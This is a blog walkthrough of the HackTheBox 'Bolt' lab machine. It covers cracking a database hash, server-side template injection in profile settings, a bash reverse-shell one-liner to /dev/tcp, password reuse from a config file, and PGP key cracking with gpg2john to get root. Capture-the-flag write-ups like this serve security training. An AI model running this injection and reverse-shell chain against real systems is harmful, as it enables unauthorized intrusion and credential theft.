In this post, I would like to share a walkthrough of the Bolt Machine from HackTheBox

This room has been considered difficulty rated as a medium machine on HackThebox

What will you gain from the Bolt machine?

For the user flag, you will execute some SSTI attack on the website to obtain a reverse shell on the machine

As for the root flag, you need to play with Chrome password reuse that has been found on the .config directory

Information Gathering

Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

Let’s try to access the website interface

On the website, there are two functions login and pages.

Firstly, let’s see the login page.

We don’t have any credentials to login but let’s try to login with normal credentials such as admin:admin

Sadly, we got error 403 ACCESS DENIED!

As a result, we need to find any credentials that we can login into the Dashboard.

On the Pages Function, there have a few links that we can look into, but Download Link caught my attention. Without further ado, let’s click the Download link

The Link has been re-direct to a page that allows us to download the file (image.tar) into our machine.

Let’s unzip the download file by using the command tar -xvf image.tar and we are presented with a lot of files

Let’s analyze all the folders and i notice that there’s a similar file in each folder.

It will take a long post if I reveal all files in the folder. So, I will just reveal those files that are important for us to obtain privileges

There’s a db.sqlite3 file where we can obtain the username and password for the Dashboard.

Gaining Privileges Access to bolt machine

We can access the db.sqlite3 by executing the sqlite3 tool

Honestly, i don’t have enough experience with the sqlite3 tool and as a result, we will need to read the help manual

From the manual, I notice that we can run the .tables command to check what tables have been saved on the db.sqlite3

We managed to obtain admin hashes by running select * from user;

Let’s save the hashes on our machine and crack the hashes by using john

However, we cannot crack the hash for some reason and we should troubleshoot the issues

After a while, I found the issues in which I have wrongly copy-paste the hashes into our machine

It should look as shown above.

Finally, we have successfully obtained the password for the admin. Let’s login the bolt.htb with the credentials such as

  • username: admin
  • password: deadbolt

Maintaining Privileges Access

Let’s roam the Dashboard to find any vulnerabilities or bugs inside here.

From the direct chat above, we have been informed that there’s another domain stored in the machine. Let’s enumerate the machine using gobuster

Wow! We successfully obtain two new subdomains which are mail and demo

The subdomain demo only shows a login page that will require credentials. Let’s create an account for the this

We are required to key in the invite code which we found earlier.

Finally, we can register an account using the invite code

Oh voila! We managed to access the Dashboard using the account that we created earlier.

On the other hand, we might be able to login the mail Roundcube using those credentials

There’s no email being stored over there while we access the mail.bolt.htb

We should be able to clarify the version of the RoundCube Webmail that we are using

Let’s roam around the Dashboard in case we found any useful vulnerabilities.

Attack verification on the website

Cross-Site Scripting

We should test any attack on the profile settings where for starters, we can use Cross-Site Scripting (XSS) to verify whether it works in the interface

An email requires us to click the link to confirm the profile change

## The step above will be repeated over and over whenever we make some changes to the profile ##

Sadly, nothing happens when we run an XSS attack on the profile.

Server Site Template Injection (SSTI) attack

As a result, we can try to exploit using the SSTI method

The step has been similar to previously

Oh wow, we managed to sight that SSTI is a thing on the system.

Let’s do some research on the SSTI Attack so that we can use it in the future

Source: SSTI-server-site-template-injection

We found a command that we can use for the SSTI method inside the HackTricks website interface

There’s another SSTI attack that the tester will normally use to verify the SSTI attack method

We got the config shown above.

From the research output, let’s try some java SSTI commands to get “id”

Sadly, we failed to get “id” output from that command

Let’s try another SSTI command

YES! We managed to retrieve the output that we wanted so badly.

Let’s start our NC listener so that we can retrieve the connection back.

For us to obtain the reverse shell connection back to us, i change “id” into “/bin/bash -c “bash -i >& /dev/tcp/<ip>/<port>”‘

We got the reverse shell back to us

On the home directory, we got two users which are Clark and Eddie

There’s passbolt directory that seems out of place that has been stored on a Linux operating system to have.

We notice that there’s a file called passbolt.php which might contain any credentials.

We got the password that we can use while reading the passbolt.php file

At last, we managed to find out that its password used by Eddie

Let’s ssh into the machine to get a better access

We can obtain a user flag by executing cat “user.txt

Escalate to Root Privileges Access on Bolt

Before we proceed with the further privileges, we need to access the MySQL database where you will find a table(secret) that has been encrypted message just like below:

 -----BEGIN PGP MESSAGE-----
 Version: OpenPGP.js v4.10.9
 Comment: https://openpgpjs.org
 wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc
 g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY
 pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H
 oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px
 l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R
 zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp
 edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u
 l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt
 oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7
 FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov
 8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey
 5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY
 NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a
 Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs
 nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6
 TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984
 =P38i
 -----END PGP MESSAGE-----

We should save the encrypted message if required in the future.

If we look back on the earlier process, we managed to obtain shell using mail factor so let’s access /var/mail/ directory where there’s an Eddie file

On the Eddie file, we sighted an email coming from Clark that mention the extension to your browser.

Let’s access the directory above in case anything appears there.

There’s a log file that we can analyze further

The file contains a lot of things, but PGP Public Key Block have caught my attention the most

We can save the PGP using anything.key and later convert it to hash format by using gpg2john anything.key > anything.hash

After converting to hash from PGP format, the file will look such as above which it can be used to obtain a password for the chrome

I stumbled over an issue over here but if everything works well, you will be provided with the password such as merrychristmas

Once we obtain the password for the merrychristmas, we can decrypt the message that was encrypted previously.

For us to obtain the password from the encrypted message, we need to execute the following command

  • gpg –batch –import anything.key
  • gpg –pinetry-mode loopback –passphrase merrychristmas -d encrypted_message.asc

In the end, you will get the password (Z(2rmxsNW(Z?3=p/9s) to access Root Privileges.

We can read the root flag by running the “cat root.txt” command

-THE END-

Happy Learning Guys!

Extra Information on Bolt

We can go to /etc/shadow so that we can unlock and read the write-up

Leave a Reply

Your email address will not be published. Required fields are marked *